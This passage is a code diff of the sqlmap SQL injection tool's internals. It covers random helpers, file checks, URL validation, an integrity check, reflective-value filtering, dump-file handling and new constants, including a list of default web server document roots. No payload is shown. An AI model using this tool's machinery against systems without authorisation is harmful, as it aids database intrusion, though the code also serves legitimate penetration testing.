retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
|
||||
except:
|
||||
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
|
||||
kb.prependFlag = True
|
||||
raise SqlmapUserQuitException
|
||||
try:
|
||||
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
kb.prependFlag = True
|
||||
raise SqlmapUserQuitException
|
||||
|
||||
finally:
|
||||
logging._releaseLock()
|
||||
@@ -967,7 +1031,12 @@ def randomRange(start=0, stop=1000, seed=None):
|
||||
423
|
||||
"""
|
||||
|
||||
randint = random.WichmannHill(seed).randint if seed is not None else random.randint
|
||||
if seed is not None:
|
||||
_ = getCurrentThreadData().random
|
||||
_.seed(seed)
|
||||
randint = _.randint
|
||||
else:
|
||||
randint = random.randint
|
||||
|
||||
return int(randint(start, stop))
|
||||
|
||||
@@ -980,7 +1049,12 @@ def randomInt(length=4, seed=None):
|
||||
874254
|
||||
"""
|
||||
|
||||
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
|
||||
if seed is not None:
|
||||
_ = getCurrentThreadData().random
|
||||
_.seed(seed)
|
||||
choice = _.choice
|
||||
else:
|
||||
choice = random.choice
|
||||
|
||||
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
|
||||
|
||||
@@ -993,7 +1067,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
|
||||
'RNvnAv'
|
||||
"""
|
||||
|
||||
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
|
||||
if seed is not None:
|
||||
_ = getCurrentThreadData().random
|
||||
_.seed(seed)
|
||||
choice = _.choice
|
||||
else:
|
||||
choice = random.choice
|
||||
|
||||
if alphabet:
|
||||
retVal = "".join(choice(alphabet) for _ in xrange(0, length))
|
||||
@@ -1022,14 +1101,17 @@ def getHeader(headers, key):
|
||||
break
|
||||
return retVal
|
||||
|
||||
def checkFile(filename):
|
||||
def checkFile(filename, raiseOnError=True):
|
||||
"""
|
||||
Checks for file existence and readability
|
||||
"""
|
||||
|
||||
valid = True
|
||||
|
||||
if filename is None or not os.path.isfile(filename):
|
||||
try:
|
||||
if filename is None or not os.path.isfile(filename):
|
||||
valid = False
|
||||
except UnicodeError:
|
||||
valid = False
|
||||
|
||||
if valid:
|
||||
@@ -1039,18 +1121,25 @@ def checkFile(filename):
|
||||
except:
|
||||
valid = False
|
||||
|
||||
if not valid:
|
||||
if not valid and raiseOnError:
|
||||
raise SqlmapSystemException("unable to read file '%s'" % filename)
|
||||
|
||||
return valid
|
||||
|
||||
def banner():
|
||||
"""
|
||||
This function prints sqlmap banner with its version
|
||||
"""
|
||||
|
||||
_ = BANNER
|
||||
if not getattr(LOGGER_HANDLER, "is_tty", False):
|
||||
_ = re.sub("\033.+?m", "", _)
|
||||
dataToStdout(_, forceOutput=True)
|
||||
if not any(_ in sys.argv for _ in ("--version", "--pickled-options")):
|
||||
_ = BANNER
|
||||
|
||||
if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv:
|
||||
_ = re.sub("\033.+?m", "", _)
|
||||
elif IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
dataToStdout(_, forceOutput=True)
|
||||
|
||||
def parsePasswordHash(password):
|
||||
"""
|
||||
@@ -1091,11 +1180,13 @@ def cleanQuery(query):
|
||||
|
||||
return retVal
|
||||
|
||||
def setPaths():
|
||||
def setPaths(rootPath):
|
||||
"""
|
||||
Sets absolute paths for project directories and files
|
||||
"""
|
||||
|
||||
paths.SQLMAP_ROOT_PATH = rootPath
|
||||
|
||||
# sqlmap paths
|
||||
paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra")
|
||||
paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "procs")
|
||||
@@ -1109,7 +1200,7 @@ def setPaths():
|
||||
paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
|
||||
|
||||
_ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
|
||||
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
|
||||
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
|
||||
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
||||
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
|
||||
|
||||
@@ -1118,6 +1209,7 @@ def setPaths():
|
||||
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
|
||||
paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
|
||||
paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
|
||||
paths.CHECKSUM_MD5 = os.path.join(paths.SQLMAP_TXT_PATH, "checksum.md5")
|
||||
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
|
||||
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
|
||||
paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt')
|
||||
@@ -1296,8 +1388,8 @@ def parseTargetUrl():
|
||||
except UnicodeError:
|
||||
_ = None
|
||||
|
||||
if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'))):
|
||||
errMsg = "invalid target URL"
|
||||
if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\n' in originalUrl)):
|
||||
errMsg = "invalid target URL ('%s')" % originalUrl
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if len(hostnamePort) == 2:
|
||||
@@ -1311,12 +1403,19 @@ def parseTargetUrl():
|
||||
else:
|
||||
conf.port = 80
|
||||
|
||||
if urlSplit.query:
|
||||
conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query
|
||||
if conf.port < 0 or conf.port > 65535:
|
||||
errMsg = "invalid target URL's port (%d)" % conf.port
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
|
||||
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
|
||||
|
||||
if urlSplit.query:
|
||||
if '=' not in urlSplit.query:
|
||||
conf.url = "%s?%s" % (conf.url, getUnicode(urlSplit.query))
|
||||
else:
|
||||
conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query
|
||||
|
||||
if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3):
|
||||
debugMsg = "setting the HTTP Referer header to the target URL"
|
||||
logger.debug(debugMsg)
|
||||
@@ -1446,7 +1545,7 @@ def parseFilePaths(page):
|
||||
"""
|
||||
|
||||
if page:
|
||||
for regex in (r" in <b>(?P<result>.*?)</b> on line", r"(?:>|\s)(?P<result>[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P<result>/\w[/\w.]+)"):
|
||||
for regex in FILE_PATH_REGEXES:
|
||||
for match in re.finditer(regex, page):
|
||||
absFilePath = match.group("result").strip()
|
||||
page = page.replace(absFilePath, "")
|
||||
@@ -1822,7 +1921,7 @@ def parseXmlFile(xmlFile, handler):
|
||||
with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
|
||||
parse(stream, handler)
|
||||
except (SAXParseException, UnicodeError), ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg = "something appears to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex))
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
@@ -1880,8 +1979,8 @@ def readCachedFileContent(filename, mode='rb'):
|
||||
if filename not in kb.cache.content:
|
||||
checkFile(filename)
|
||||
try:
|
||||
with openFile(filename, mode) as f:
|
||||
kb.cache.content[filename] = f.read()
|
||||
with openFile(filename, mode) as f:
|
||||
kb.cache.content[filename] = f.read()
|
||||
except (IOError, OSError, MemoryError), ex:
|
||||
errMsg = "something went wrong while trying "
|
||||
errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex))
|
||||
@@ -2183,7 +2282,22 @@ def pushValue(value):
|
||||
Push value to the stack (thread dependent)
|
||||
"""
|
||||
|
||||
getCurrentThreadData().valueStack.append(copy.deepcopy(value))
|
||||
_ = None
|
||||
success = False
|
||||
|
||||
for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT):
|
||||
try:
|
||||
getCurrentThreadData().valueStack.append(copy.deepcopy(value))
|
||||
success = True
|
||||
break
|
||||
except Exception, ex:
|
||||
_ = ex
|
||||
|
||||
if not success:
|
||||
getCurrentThreadData().valueStack.append(None)
|
||||
|
||||
if _:
|
||||
raise _
|
||||
|
||||
def popValue():
|
||||
"""
|
||||
@@ -2762,7 +2876,7 @@ def setOptimize():
|
||||
conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor))
|
||||
|
||||
if not conf.nullConnection:
|
||||
debugMsg = "turning off --null-connection switch used indirectly by switch -o"
|
||||
debugMsg = "turning off switch '--null-connection' used indirectly by switch '-o'"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
def initTechnique(technique=None):
|
||||
@@ -2917,7 +3031,7 @@ def showHttpErrorCodes():
|
||||
msg += "could mean that some kind of protection is involved (e.g. WAF)"
|
||||
logger.debug(msg)
|
||||
|
||||
def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
|
||||
def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436)
|
||||
"""
|
||||
Returns file handle of a given filename
|
||||
"""
|
||||
@@ -2950,7 +3064,10 @@ def decodeIntToUnicode(value):
|
||||
_ = "0%s" % _
|
||||
raw = hexdecode(_)
|
||||
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
if Backend.isDbms(DBMS.MYSQL):
|
||||
# https://github.com/sqlmapproject/sqlmap/issues/1531
|
||||
retVal = getUnicode(raw, conf.charset or UNICODE_ENCODING)
|
||||
elif Backend.isDbms(DBMS.MSSQL):
|
||||
retVal = getUnicode(raw, "UTF-16-BE")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE):
|
||||
retVal = unichr(value)
|
||||
@@ -2963,6 +3080,24 @@ def decodeIntToUnicode(value):
|
||||
|
||||
return retVal
|
||||
|
||||
def checkIntegrity():
|
||||
"""
|
||||
Checks integrity of code files during the unhandled exceptions
|
||||
"""
|
||||
|
||||
logger.debug("running code integrity check")
|
||||
|
||||
retVal = True
|
||||
for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)):
|
||||
path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _))
|
||||
if not os.path.isfile(path):
|
||||
logger.error("missing file detected '%s'" % path)
|
||||
retVal = False
|
||||
elif hashlib.md5(open(path, 'rb').read()).hexdigest() != checksum:
|
||||
logger.error("wrong checksum of file '%s' detected" % path)
|
||||
retVal = False
|
||||
return retVal
|
||||
|
||||
def unhandledExceptionMessage():
|
||||
"""
|
||||
Returns detailed message about occurred unhandled exception
|
||||
@@ -3126,14 +3261,6 @@ def intersect(valueA, valueB, lowerCase=False):
|
||||
|
||||
return retVal
|
||||
|
||||
def cpuThrottle(value):
|
||||
"""
|
||||
Does a CPU throttling for lesser CPU consumption
|
||||
"""
|
||||
|
||||
delay = 0.00001 * (value ** 2)
|
||||
time.sleep(delay)
|
||||
|
||||
def removeReflectiveValues(content, payload, suppressWarning=False):
|
||||
"""
|
||||
Neutralizes reflective values in a given content based on a payload
|
||||
@@ -3142,59 +3269,65 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
||||
|
||||
retVal = content
|
||||
|
||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
|
||||
def _(value):
|
||||
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
||||
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
||||
return value
|
||||
try:
|
||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
|
||||
def _(value):
|
||||
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
||||
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
||||
return value
|
||||
|
||||
payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
|
||||
regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
|
||||
payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
|
||||
regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
|
||||
|
||||
if regex != payload:
|
||||
if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check
|
||||
parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
|
||||
retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach
|
||||
if regex != payload:
|
||||
if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check
|
||||
parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
|
||||
retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach
|
||||
|
||||
if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs
|
||||
regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
|
||||
if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs
|
||||
regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
|
||||
|
||||
parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
|
||||
parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
|
||||
|
||||
if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
|
||||
else:
|
||||
regex = r"\b%s" % regex
|
||||
if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
|
||||
else:
|
||||
regex = r"\b%s" % regex
|
||||
|
||||
if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
|
||||
else:
|
||||
regex = r"%s\b" % regex
|
||||
if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
|
||||
else:
|
||||
regex = r"%s\b" % regex
|
||||
|
||||
retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
|
||||
if len(parts) > 2:
|
||||
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
||||
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
if len(parts) > 2:
|
||||
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
||||
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
|
||||
if retVal != content:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
||||
if not suppressWarning:
|
||||
warnMsg = "reflective value(s) found and filtering out"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
|
||||
warnMsg = "frames detected containing attacked parameter values. Please be sure to "
|
||||
warnMsg += "test those separately in case that attack on this page fails"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
|
||||
if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
|
||||
kb.reflectiveMechanism = False
|
||||
if retVal != content:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
||||
if not suppressWarning:
|
||||
debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
|
||||
logger.debug(debugMsg)
|
||||
warnMsg = "reflective value(s) found and filtering out"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
|
||||
warnMsg = "frames detected containing attacked parameter values. Please be sure to "
|
||||
warnMsg += "test those separately in case that attack on this page fails"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
|
||||
if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
|
||||
kb.reflectiveMechanism = False
|
||||
if not suppressWarning:
|
||||
debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
|
||||
logger.debug(debugMsg)
|
||||
except MemoryError:
|
||||
kb.reflectiveMechanism = False
|
||||
if not suppressWarning:
|
||||
debugMsg = "turning off reflection removal mechanism (because of low memory issues)"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
return retVal
|
||||
|
||||
@@ -3231,7 +3364,7 @@ def safeSQLIdentificatorNaming(name, isTable=False):
|
||||
retVal = "\"%s\"" % retVal.strip("\"")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
|
||||
retVal = "\"%s\"" % retVal.strip("\"").upper()
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and not re.match(r"\A\w+\Z", retVal, re.U):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
|
||||
retVal = "[%s]" % retVal.strip("[]")
|
||||
|
||||
if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
|
||||
@@ -3870,7 +4003,7 @@ def resetCookieJar(cookieJar):
|
||||
|
||||
content = readCachedFileContent(conf.loadCookies)
|
||||
lines = filter(None, (line.strip() for line in content.split("\n") if not line.startswith('#')))
|
||||
handle, filename = tempfile.mkstemp(prefix="sqlmapcj-")
|
||||
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR)
|
||||
os.close(handle)
|
||||
|
||||
# Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html
|
||||
|
||||
@@ -11,7 +11,6 @@ import pickle
|
||||
import re
|
||||
import StringIO
|
||||
import sys
|
||||
import types
|
||||
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
@@ -161,7 +160,7 @@ def htmlunescape(value):
|
||||
codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&'))
|
||||
retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
|
||||
try:
|
||||
retVal = re.sub(r"&#x([^;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
|
||||
retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
|
||||
except ValueError:
|
||||
pass
|
||||
return retVal
|
||||
|
||||
@@ -8,8 +8,6 @@ See the file 'doc/COPYING' for copying permission
|
||||
import copy
|
||||
import types
|
||||
|
||||
from lib.core.exception import SqlmapDataException
|
||||
|
||||
class AttribDict(dict):
|
||||
"""
|
||||
This class defines the sqlmap object, inheriting from Python data
|
||||
@@ -43,7 +41,7 @@ class AttribDict(dict):
|
||||
try:
|
||||
return self.__getitem__(item)
|
||||
except KeyError:
|
||||
raise SqlmapDataException("unable to access item '%s'" % item)
|
||||
raise AttributeError("unable to access item '%s'" % item)
|
||||
|
||||
def __setattr__(self, item, value):
|
||||
"""
|
||||
@@ -93,6 +91,7 @@ class InjectionDict(AttribDict):
|
||||
self.prefix = None
|
||||
self.suffix = None
|
||||
self.clause = None
|
||||
self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888
|
||||
|
||||
# data is a dict with various stype, each which is a dict with
|
||||
# all the information specific for that stype
|
||||
|
||||
@@ -15,10 +15,13 @@ def cachedmethod(f, cache={}):
|
||||
def _(*args, **kwargs):
|
||||
try:
|
||||
key = (f, tuple(args), frozenset(kwargs.items()))
|
||||
if key not in cache:
|
||||
cache[key] = f(*args, **kwargs)
|
||||
except:
|
||||
key = "".join(str(_) for _ in (f, args, kwargs))
|
||||
if key not in cache:
|
||||
cache[key] = f(*args, **kwargs)
|
||||
if key not in cache:
|
||||
cache[key] = f(*args, **kwargs)
|
||||
|
||||
return cache[key]
|
||||
|
||||
return _
|
||||
|
||||
@@ -11,7 +11,6 @@ _defaults = {
|
||||
"csvDel": ",",
|
||||
"timeSec": 5,
|
||||
"googlePage": 1,
|
||||
"cpuThrottle": 5,
|
||||
"verbose": 1,
|
||||
"delay": 0,
|
||||
"timeout": 30,
|
||||
@@ -22,7 +21,7 @@ _defaults = {
|
||||
"risk": 1,
|
||||
"dumpFormat": "CSV",
|
||||
"tech": "BEUSTQ",
|
||||
"torType": "HTTP",
|
||||
"torType": "SOCKS5",
|
||||
}
|
||||
|
||||
defaults = AttribDict(_defaults)
|
||||
|
||||
@@ -234,6 +234,6 @@ DUMP_DATA_PREPROCESS = {
|
||||
}
|
||||
|
||||
DEFAULT_DOC_ROOTS = {
|
||||
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"),
|
||||
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
||||
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
||||
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
||||
}
|
||||
|
||||
@@ -9,10 +9,12 @@ import cgi
|
||||
import hashlib
|
||||
import os
|
||||
import re
|
||||
import shutil
|
||||
import tempfile
|
||||
import threading
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import checkFile
|
||||
from lib.core.common import dataToDumpFile
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSafeExString
|
||||
@@ -37,6 +39,7 @@ from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapValueException
|
||||
from lib.core.exception import SqlmapSystemException
|
||||
from lib.core.replication import Replication
|
||||
from lib.core.settings import DUMP_FILE_BUFFER_SIZE
|
||||
from lib.core.settings import HTML_DUMP_CSS_STYLE
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import METADB_SUFFIX
|
||||
@@ -116,9 +119,15 @@ class Dump(object):
|
||||
elif data is not None:
|
||||
_ = getUnicode(data)
|
||||
|
||||
if _ and _[-1] == '\n':
|
||||
if _.endswith("\r\n"):
|
||||
_ = _[:-2]
|
||||
|
||||
elif _.endswith("\n"):
|
||||
_ = _[:-1]
|
||||
|
||||
if _.strip(' '):
|
||||
_ = _.strip(' ')
|
||||
|
||||
if "\n" in _:
|
||||
self._write("%s:\n---\n%s\n---" % (header, _))
|
||||
else:
|
||||
@@ -433,7 +442,7 @@ class Dump(object):
|
||||
dumpDbPath = tempDir
|
||||
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
|
||||
if not os.path.isfile(dumpFileName):
|
||||
if not checkFile(dumpFileName, False):
|
||||
try:
|
||||
openFile(dumpFileName, "w+b").close()
|
||||
except SqlmapSystemException:
|
||||
@@ -447,9 +456,24 @@ class Dump(object):
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||
else:
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||
else:
|
||||
appendToFile = any((conf.limitStart, conf.limitStop))
|
||||
|
||||
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
|
||||
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
|
||||
if not appendToFile:
|
||||
count = 1
|
||||
while True:
|
||||
candidate = "%s.%d" % (dumpFileName, count)
|
||||
if not checkFile(candidate, False):
|
||||
try:
|
||||
shutil.copyfile(dumpFileName, candidate)
|
||||
except IOError:
|
||||
pass
|
||||
finally:
|
||||
break
|
||||
else:
|
||||
count += 1
|
||||
|
||||
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE)
|
||||
|
||||
count = int(tableValues["__infos__"]["count"])
|
||||
separator = str()
|
||||
|
||||
@@ -194,6 +194,7 @@ class OPTION_TYPE:
|
||||
|
||||
class HASHDB_KEYS:
|
||||
DBMS = "DBMS"
|
||||
DBMS_FORK = "DBMS_FORK"
|
||||
CHECK_WAF_RESULT = "CHECK_WAF_RESULT"
|
||||
CONF_TMP_PATH = "CONF_TMP_PATH"
|
||||
KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS"
|
||||
@@ -351,3 +352,15 @@ class AUTOCOMPLETE_TYPE:
|
||||
SQL = 0
|
||||
OS = 1
|
||||
SQLMAP = 2
|
||||
|
||||
class NOTE:
|
||||
FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
|
||||
|
||||
class MKSTEMP_PREFIX:
|
||||
HASHES = "sqlmaphashes-"
|
||||
CRAWLER = "sqlmapcrawler-"
|
||||
IPC = "sqlmapipc-"
|
||||
TESTING = "sqlmaptesting-"
|
||||
RESULTS = "sqlmapresults-"
|
||||
COOKIE_JAR = "sqlmapcookiejar-"
|
||||
BIG_ARRAY = "sqlmapbigarray-"
|
||||
|
||||
@@ -120,6 +120,7 @@ from lib.core.settings import MAX_CONNECT_RETRIES
|
||||
from lib.core.settings import MAX_NUMBER_OF_THREADS
|
||||
from lib.core.settings import NULL
|
||||
from lib.core.settings import PARAMETER_SPLITTING_REGEX
|
||||
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
|
||||
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
||||
from lib.core.settings import SITE
|
||||
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
|
||||
@@ -127,12 +128,14 @@ from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
|
||||
from lib.core.settings import SUPPORTED_DBMS
|
||||
from lib.core.settings import SUPPORTED_OS
|
||||
from lib.core.settings import TIME_DELAY_CANDIDATES
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.settings import UNION_CHAR_REGEX
|
||||
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
||||
from lib.core.settings import URI_INJECTABLE_REGEX
|
||||
from lib.core.settings import VERSION_STRING
|
||||
from lib.core.settings import WEBSCARAB_SPLITTER
|
||||
from lib.core.threads import getCurrentThreadData
|
||||
from lib.core.threads import setDaemon
|
||||
from lib.core.update import update
|
||||
from lib.parse.configfile import configFileParser
|
||||
from lib.parse.payloads import loadBoundaries
|
||||
@@ -151,8 +154,8 @@ from lib.utils.crawler import crawl
|
||||
from lib.utils.deps import checkDependencies
|
||||
from lib.utils.search import search
|
||||
from lib.utils.purge import purge
|
||||
from thirdparty.colorama.initialise import init as coloramainit
|
||||
from thirdparty.keepalive import keepalive
|
||||
from thirdparty.multipart import multipartpost
|
||||
from thirdparty.oset.pyoset import oset
|
||||
from thirdparty.socks import socks
|
